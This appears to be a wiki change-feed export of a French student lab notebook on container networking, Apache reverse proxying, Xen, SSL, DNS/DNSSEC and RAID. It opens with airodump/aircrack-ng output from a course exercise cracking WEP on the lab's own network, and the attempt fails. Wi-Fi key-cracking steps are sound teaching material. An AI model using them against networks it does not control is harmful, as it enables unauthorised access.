 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# ls&lt;br /&gt;
3D				       Documents&lt;br /&gt;
Arduino				       Downloads&lt;br /&gt;
crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
Desktop				       Videos&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Read 13001 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse	IN	A	193.48.57.189&lt;br /&gt;
 site1	        IN	A	193.48.57.189&lt;br /&gt;
 site2	        IN	A	193.48.57.189&lt;br /&gt;
&lt;br /&gt;
Nous n'avons pas réussis à tester le fonctionnement car nous avons rencontré une erreur au niveau de la commande '''nsenter'''. en effet les conteneur ne sont pas isolés des processus extérieurs. Tous nos serveurs apaches ce sont donc installés or des '''unshare''' et forcément ne cohabitent donc pas très bien ensemble. Nous avons trouvé une piste qui serait en lien avec le /proc/self du système. la commande '''nsenter''' ne reconnaît pas les processus monté pas '''mount'''&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46620</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46620"/>
				<updated>2017-12-13T14:16:54Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
